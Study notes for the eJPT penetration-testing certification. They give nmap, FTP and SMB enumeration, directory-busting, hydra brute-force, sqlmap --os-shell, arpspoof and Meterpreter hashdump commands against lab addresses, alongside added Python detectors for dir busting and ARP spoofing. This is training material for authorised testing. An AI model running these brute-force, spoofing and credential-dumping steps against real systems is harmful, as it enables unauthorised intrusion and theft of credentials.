
eJPT Notes 2022 (eLearnSecurity Junior Penetration Tester)

Collection of notes to prepare for the eLearnSecurity eJPT certification exam.

Before you continue reading, please do the following:

1. Please sign up for a FREE https://ine.com account, and complete the Penetration Testing Student course. It is ABSOLUTELY FREE! To be honest, everything you need to pass the eJPT is in that free course.

2. Do NOT treat this exam as a CTF box. This is NOT like a CTF box. Host Discovery is important.

Host Discovery / Enumeration

Let's find out what we are working with. We are completely blind.

Ping Sweep, who can we find on the network?

fping:

fping -a -g {IP RANGE} 2>/dev/null

fping example:

fping -a -g 10.10.10.0/8 2>/dev/null

Nmap Ping Sweep:

nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*'

Enumerate Hosts Found on Network

Once you have found alive hosts on a network, it's time to knock on the doors.

Nmap TCP Quick Scan (Step 1)

nmap -sC -sV 10.10.10.10

This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
Nmap TCP Full Scan (Step 2)

nmap -sC -sV -p- 10.10.10.10

Nmap UDP Quick Scan

nmap -sU -sV 10.10.10.10

Always save your scans; you never know when you need to pull them up. If you want every format at once, -oA basename writes normal, grepable and XML output side by side.

nmap -sn 10.10.10.0/24 -oN hosts.nmap

Find Common Vulnerabilities

After you have done all of your scans and identified open ports on your target, it's time to see if any services are vulnerable.

Common Ports to Look at:

Port   Protocol
21     FTP
22     SSH
23     TELNET
25     SMTP
53     DNS
80     HTTP
443    HTTPS
110    POP3
115    SFTP
143    IMAP
135    MSRPC
137    NETBIOS
138    NETBIOS
139    NETBIOS
445    SMB
3306   MYSQL
1433   MSSQL
3389   RDP

Use Nmap as a Lightweight Vulnerability Scanner

nmap -sV --script=vulners -v 10.10.10.1

If you do not have vulners installed, get it here: https://github.com/vulnersCom/nmap-vulners

nmap --script vuln --script-args=unsafe=1 -iL hosts.nmap

Note that -iL expects a plain, newline-separated list of targets; the normal-format file written by -oN above is not usable as-is, so save the sweep in grepable format (-oG) or extract the addresses into a list first. The unsafe=1 argument enables scripts that can crash or hang the service they probe, so only use it where that is acceptable.
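The -iL caveat above is easy to handle with a small parser. This is an added example and not part of the original notes: it reads nmap's grepable (-oG) output, returns the hosts reported Up as a list ready to feed to -iL, and picks out the hosts with a given port open (handy when you want to run the SMB checks later only against hosts with 445 open). SAMPLE_GREPABLE is a constructed imitation of -oG output, and the function and file names are my own assumptions.

```python
"""Parse nmap grepable (-oG) output into target lists.

Added example, not from the original notes. SAMPLE_GREPABLE is a constructed
imitation of what `nmap -sV -oG` writes; function names are my own.
"""
import re
from collections import defaultdict

# Constructed sample: two hosts up with service banners, one host down.
SAMPLE_GREPABLE = """\
# Nmap 7.93 scan initiated as: nmap -sV -oG - 10.10.10.0/24
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2/, 80/open/tcp//http//Apache httpd 2.4.18/, 445/open/tcp//microsoft-ds//Samba smbd 3.X/\tIgnored State: closed (997)
Host: 10.10.10.11 ()\tStatus: Up
Host: 10.10.10.11 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (998)
Host: 10.10.10.12 ()\tStatus: Down
# Nmap done -- 3 IP addresses (2 hosts up)
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
# One port entry in -oG is port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return {ip: {"status": "Up"/"Down"/None, "ports": [(port, state, proto, service, version), ...]}}."""
    hosts = defaultdict(lambda: {"status": None, "ports": []})
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment/banner lines start with '#'
        ip = m.group(1)
        # The remaining fields (Status:, Ports:, Ignored State:) are tab separated
        for field in line[m.end():].split("\t"):
            field = field.strip()
            if field.startswith("Status:"):
                hosts[ip]["status"] = field.split(":", 1)[1].strip()
            elif field.startswith("Ports:"):
                for port, state, proto, service, version in PORT_RE.findall(field):
                    hosts[ip]["ports"].append((int(port), state, proto, service, version))
    return dict(hosts)


def live_hosts(hosts):
    """IPs reported Up, one per entry: exactly the shape nmap -iL expects."""
    return [ip for ip, h in hosts.items() if h["status"] == "Up"]


def hosts_with_open_port(hosts, port, proto="tcp"):
    """IPs where `port` is open (filtered/closed do not count)."""
    return [ip for ip, h in hosts.items()
            if any(p == port and s == "open" and pr == proto for p, s, pr, _, _ in h["ports"])]


def write_target_list(hosts, path):
    """Write live hosts to `path` (assumed name) for a later `nmap -iL path`."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(live_hosts(hosts)) + "\n")


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_GREPABLE)
    print("live:", live_hosts(parsed))
    print("445 open:", hosts_with_open_port(parsed, 445))
    for ip, h in parsed.items():
        for port, state, proto, service, version in h["ports"]:
            print(f"{ip}:{port}/{proto} {state} {service} {version}")
```

Feed the real file with `parse_grepable(open("hosts.gnmap").read())`; the version column is what you search in Searchsploit later, so keeping it in the tuple saves re-running the scan.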

Port 21 - FTP Enumeration

Sometimes clues are put here. :wink: Old versions of FTP may be vulnerable. Always check the version. Search for the exploit using Google / Searchsploit / Rapid7. If you find credentials, try them on SSH / the login page / the database.

Enumerate FTP Service with Nmap:

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Check for FTP Vulnerabilities with Nmap:

nmap --script=ftp-* -p 21 10.10.10.1

Connect to FTP Service:

ftp 10.10.10.1

ncftp 10.10.10.1

Many FTP servers allow anonymous users. Try anonymous:anonymous.

Brute-force FTP with a Known Username You Found:

hydra -l $user -P /usr/share/john/password.lst ftp://10.10.10.1:21

hydra -l $user -P /usr/share/wordlists/nmap.lst -f 10.10.10.1 ftp -V

medusa -h 10.10.10.1 -u $user -P passwords.txt -M ftp

Enumerate Users on FTP Service:

ftp-user-enum.pl -U users.txt -t 10.10.10.1

ftp-user-enum.pl -M iu -U users.txt -t $ip

If you do not have ftp-user-enum.pl, you can download it here: https://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz

Useful Commands for FTP Service (cmd line):

• send     # Send a single file
• put      # Send one file
• mput     # Send multiple files
• mget     # Get multiple files
• get      # Get a file from the remote computer
• ls       # List the remote directory
• mget *   # Download everything
• binary   # Switch to binary transfer mode
• ascii    # Switch to ASCII transfer mode

Switch to binary before pulling anything that is not plain text (archives, executables, images); in ASCII mode the client rewrites line endings and corrupts the file.

Always Check for FTP Configuration Files:

• ftpusers
• ftp.conf
• proftpd.conf

Vulnerable FTP Versions:

• ProFTPD-1.3.3c Backdoor
• ProFTPD 1.3.5 Mod_Copy Command Execution
• VSFTPD v2.3.4 Backdoor Command Execution

FTP Exploitation Methodology:

1. Gather version numbers
2. Check Searchsploit
3. Check for default creds
4. Use creds previously gathered
5. Download the software

Port 445 - SMB Enumeration

Always check for SMB. You might get lucky and find a vulnerable machine running SMB that has remote code execution. Remember to use Searchsploit or Google to check all service versions for publicly available exploits.

Scan for NETBIOS/SMB Service with Nmap:

nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24

Scan for NETBIOS/SMB Service with nbtscan:

nbtscan -r 192.168.1.0/24

Enumerate the Hostname:

nmblookup -A 10.10.10.1

Check for Null Sessions:

smbmap -H 10.10.10.1

rpcclient -U "" -N 10.10.10.1

smbclient \\\\$ip\\ShareName

If you get the error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", the server usually only speaks SMB1 and a current client refuses it by default; retry allowing NT1:

smbclient -L //10.10.10.3/ --option='client min protocol=NT1'

List Shares:
smbmap -H 10.10.1.1

echo exit | smbclient -L \\\\10.10.10.10

nmap --script smb-enum-shares -p 139,445 10.10.10.10

Check for SMB Vulnerabilities with Nmap:

nmap --script smb-vuln* -p 139,445 10.10.10.10

Vulnerable Versions:

• Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
• Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created by default
• Most Samba (Unix) servers

List of SMB versions and corresponding Windows versions:

• SMB1 – Windows 2000, XP and Windows 2003.
• SMB2 – Windows Vista SP1 and Windows 2008
• SMB2.1 – Windows 7 and Windows 2008 R2
• SMB3 – Windows 8 and Windows 2012.

Web Application Enumeration / Exploitation - Port 80,443,8080

Make sure that you enumerate, and enumerate some more. :wink:

Web Application Enumeration Checklist:

1. Check out the entire webpage and what it is displaying.
2. Read every page, look for emails, names, user info, etc.
3. Directory Discovery (time to dir bust!)
4. Enumerate the interface, what is the CMS & Version? Server installation page?
5. Check for potential Local File Inclusion, Remote File Inclusion, SQL Injection, XXE, and Upload vulnerabilities
6. Check for a default server page, identify the server version
7. View Source Code:
   a. Check for hidden values
   b. Check for comments/developer remarks
   c. Check for extraneous code
   d. Check for passwords
8. Check for robots.txt file
9. Web Scanning
Directory Discovery/Dir Busting:

gobuster dir -u 10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/common.txt

Gobuster Quick Directory Discovery:

gobuster -u $ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux

Gobuster Directory Busting:

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://10.10.10.10

gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50

Gobuster comprehensive directory busting:

gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.

Gobuster search with file extension:

gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .txt,.php

The commands without the dir keyword use the gobuster v2 syntax; on gobuster v3 prefix them with "gobuster dir" as in the -o gobuster-root example above.

wfuzz search with files:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://10.10.10.10/FUZZ

Erodir by PinkP4nther

./erodir -u http://10.10.10.10 -e /usr/share/wordlists/dirb/common.txt -t 20

dirsearch.py

cd /root/dirsearch; python3 dirsearch.py -u http://10.10.10.10/ -e .php

If you are really stuck, run this:

for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "

Check different extensions:

sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
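Seen from the web server's side, the dir busting above is a burst of 404s from one source, often with a telltale user agent (the -a Linux flag above sets exactly that). As an added example, not part of the original notes, here is the detection logic run over constructed Apache combined-format log lines; the 20-in-60-seconds threshold and the function names are my own assumptions.

```python
"""Flag directory brute-forcing from web server access logs.

Added example, not from the original notes. The log lines are constructed in
Apache combined format; window/threshold values are assumptions to tune.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed: typical entries from a wordlist such as common.txt.
WORDLIST_PATHS = [
    "admin", "backup", "cgi-bin", "config", "db", "images", "js", "login", "old",
    "phpmyadmin", "private", "robots.txt", "secret", "server-status", "test", "tmp",
    "upload", "uploads", "vendor", "wp-admin", "wp-login.php", "xmlrpc.php", ".git",
    ".env", "api",
]


def constructed_log():
    """One normal visitor (10.10.10.50) and one scanner (10.10.10.99) hitting 25 paths in 25 s."""
    lines = ['10.10.10.50 - - [04/Nov/2023:03:32:00 -0500] "GET /index.html HTTP/1.1" 200 2314 "-" "Mozilla/5.0"']
    for sec, path in enumerate(WORDLIST_PATHS):
        status = 200 if path == "robots.txt" else 404  # the one guess that exists
        lines.append(f'10.10.10.99 - - [04/Nov/2023:03:32:{sec:02d} -0500] '
                     f'"GET /{path} HTTP/1.1" {status} 196 "-" "Linux"')
    lines.append('10.10.10.50 - - [04/Nov/2023:03:32:30 -0500] "GET /missing.png HTTP/1.1" 404 196 "-" "Mozilla/5.0"')
    return lines


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_dirbusting(lines, window_seconds=60, threshold=20):
    """Return {ip: (count, first_ts, last_ts, user_agent)} for each source that
    produced `threshold` or more 404s inside any `window_seconds` window."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent 404s
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # slide the window forward
        if len(q) >= threshold and rec["ip"] not in alerts:
            alerts[rec["ip"]] = (len(q), q[0], q[-1], rec["ua"])
    return alerts


if __name__ == "__main__":
    for ip, (n, first, last, ua) in detect_dirbusting(constructed_log()).items():
        print(f"{ip}: {n} x 404 between {first:%H:%M:%S} and {last:%H:%M:%S}, UA={ua!r}")
```

A single legitimate 404 from 10.10.10.50 never trips the rule, while the scanner is flagged at its twentieth miss. Counting 403s as well catches guesses that land on existing but forbidden paths, which is why the gobuster -s list above includes 403.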

SQL Injection Testing (automated!)

If you follow the above checklist, you should have a list of parameters to test for SQL injection. Automate it with SQLMAP!

SQLmap Commands:

sqlmap -u http://10.10.10.10 -p parameter


sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump

Password Cracking

I highly suggest you learn how to use John The Ripper, Hydra, and how to unshadow passwd files. :wink:

Unshadow

This prepares the file for John The Ripper; you need both the passwd and shadow files.

unshadow passwd shadow > unshadow

Hash Cracking - John The Ripper

john --wordlist=/path/to/wordlist --users=users.txt hashfile

Networking - Routing

I highly recommend that you get comfortable with general networking and routing concepts, including being able to read and understand .PCAP files.

Set up IP Routing and Routing Tables

ip route - prints the routing table for the host you are on
ip route add ROUTETO via ROUTEFROM - adds a route to the network ROUTETO through the gateway ROUTEFROM (the gateway must be on a network you are already attached to); you need this when you are on a switched network and have to pivot into another subnet

ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

Enable IP forwarding first: with -r, arpspoof poisons both hosts so traffic in each direction passes through you, and without forwarding that traffic is dropped and the two hosts simply lose connectivity.

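The same technique is easy to spot from the defender's side, because poisoning leaves two signatures: an IP whose MAC suddenly changes, and one MAC answering for several IPs. This added example, not part of the original notes, runs that check over constructed ARP reply records of the form (time, sender_ip, sender_mac), which is what a sniffer or an arpwatch-style monitor would hand you; the sample addresses and function names are my own.

```python
"""Detect ARP cache poisoning from a stream of ARP replies.

Added example, not from the original notes. ARP_REPLIES is constructed:
the gateway .1 and host .11 answer normally, then a third MAC (..:99)
starts answering for both, which is what bidirectional poisoning looks like.
"""
from collections import defaultdict

ARP_REPLIES = [
    (0.0, "10.10.10.1",  "aa:bb:cc:00:00:01"),
    (0.5, "10.10.10.11", "aa:bb:cc:00:00:11"),
    (1.0, "10.10.10.1",  "aa:bb:cc:00:00:01"),
    (5.0, "10.10.10.1",  "AA:BB:CC:00:00:99"),  # gateway now "moves" to the attacker
    (5.1, "10.10.10.11", "aa:bb:cc:00:00:99"),  # and so does the victim host
    (7.0, "10.10.10.1",  "aa:bb:cc:00:00:99"),  # steady state, already reported
]


def detect_arp_spoof(replies):
    """Return a list of (time, kind, subject, detail) alerts.

    kind is "mac-change" when an IP's MAC differs from the last one recorded
    (the table is updated so flip-flops are reported each time), or
    "one-mac-many-ips" the first time a MAC has claimed more than one IP.
    """
    table = {}                    # ip -> last MAC seen
    ips_by_mac = defaultdict(set)  # mac -> IPs it has answered for
    flagged_macs = set()
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()          # normalise case before comparing
        known = table.setdefault(ip, mac)
        if known != mac:
            alerts.append((t, "mac-change", ip, f"{known} -> {mac}"))
            table[ip] = mac
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1 and mac not in flagged_macs:
            flagged_macs.add(mac)
            alerts.append((t, "one-mac-many-ips", mac, ",".join(sorted(ips_by_mac[mac]))))
    return alerts


if __name__ == "__main__":
    for t, kind, subject, detail in detect_arp_spoof(ARP_REPLIES):
        print(f"t={t:4.1f}s {kind:18s} {subject:20s} {detail}")
```

A NIC replacement or a VRRP gateway failover also triggers the mac-change rule, so correlate it with change records; the one-mac-many-ips rule is the stronger signal, since a legitimate host rarely answers ARP for the gateway's address.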
SSH Tunneling / Port Forwarding

# local port forwarding
# the target host 192.168.0.100 is running a service on port 8888
# and you want that service available on the localhost port 7777

ssh -L 7777:localhost:8888 user@192.168.0.100

# remote port forwarding
# you are running a service on localhost port 9999
# and you want that service available on the target host 192.168.0.100 port 12340

ssh -R 12340:localhost:9999 user@192.168.0.100

# Local proxy through remote host
# You want to route network traffic through a remote host target.host
# so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001

ssh -C2qTnN -D 12001 user@target.host

Note where "localhost" is resolved: in the -L form it is the remote host's own loopback (the service on 192.168.0.100:8888), in the -R form it is your machine's loopback (your service on port 9999). Substitute another address there to reach a third host behind the SSH server.

Network/Service Attacks

You may need to brute-force a running service such as SSH or FTP. Just replace the service name below.

hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22


hydra -L users.txt -P pass.txt telnet://10.10.10.10

Using Metasploit

I highly recommend getting comfortable with Metasploit and Meterpreter, just in case you find Remote Code Execution and need to spawn a shell.

Basic Metasploit Commands

search x
use x
info
show options, show advanced options
set X (e.g. set RHOST 10.10.10.10, set payload x; most current modules take RHOSTS rather than RHOST, check show options)

Useful Meterpreter Commands (reverse shell)

background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump
